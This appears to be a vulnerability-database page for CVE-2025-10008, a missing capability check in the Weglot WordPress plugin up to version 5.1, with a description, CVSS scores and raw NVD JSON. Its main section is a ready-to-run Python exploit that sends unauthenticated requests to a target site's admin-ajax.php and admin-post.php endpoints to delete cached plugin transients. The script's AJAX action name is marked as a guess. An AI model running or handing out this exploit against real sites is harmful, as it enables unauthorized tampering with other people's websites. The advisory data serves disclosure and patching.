Security Vulnerability Report
CVE-2025-10008 CVSS 5.3 MEDIUM

CVE-2025-10008

Published: 2025-10-30 06:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clean_options' function in all versions up to, and including, 5.1. This makes it possible for unauthenticated attackers to delete limited transients that contain cached plugin options.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Weglot plugin <= 5.1 (all versions up to and including 5.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-10008 PoC - Weglot Plugin Unauthorized Transient Deletion
# Target: WordPress site with Weglot plugin <= 5.1


def exploit_weglot(target_url):
    """
    Exploit for CVE-2025-10008
    Missing capability check on clean_options function
    Allows unauthenticated deletion of plugin transients
    """
    # Prepare the exploit payload
    # The clean_options function is typically hooked to an AJAX action
    exploit_data = {
        'action': 'weglot_clean_options',  # AJAX action hook
        'nonce': ''  # Nonce not required due to missing capability check
    }

    # Try common AJAX endpoints
    endpoints = [
        f'{target_url}/wp-admin/admin-ajax.php',
        f'{target_url}/wp-admin/admin-post.php'
    ]

    for endpoint in endpoints:
        try:
            response = requests.post(endpoint, data=exploit_data, timeout=10)
            if response.status_code == 200:
                print(f'[+] Successfully sent exploit to {endpoint}')
                print(f'[+] Response: {response.text[:200]}')
                return True
        except requests.RequestException as e:
            print(f'[-] Request failed: {e}')

    return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2025_10008.py <target_url>')
        print('Example: python cve_2025_10008.py http://example.com')
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    print(f'[*] Targeting: {target}')
    print(f'[*] Exploiting CVE-2025-10008...')
    exploit_weglot(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10008", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:42.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clean_options' function in all versions up to, and including, 5.1. This makes it possible for unauthenticated attackers to delete limited transients that contain cached plugin options."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/front/class-clean-options.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3383165/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb2a8a6f-fe97-4588-a084-64f502a40c51?source=cve", "source": "[email protected]"}]}}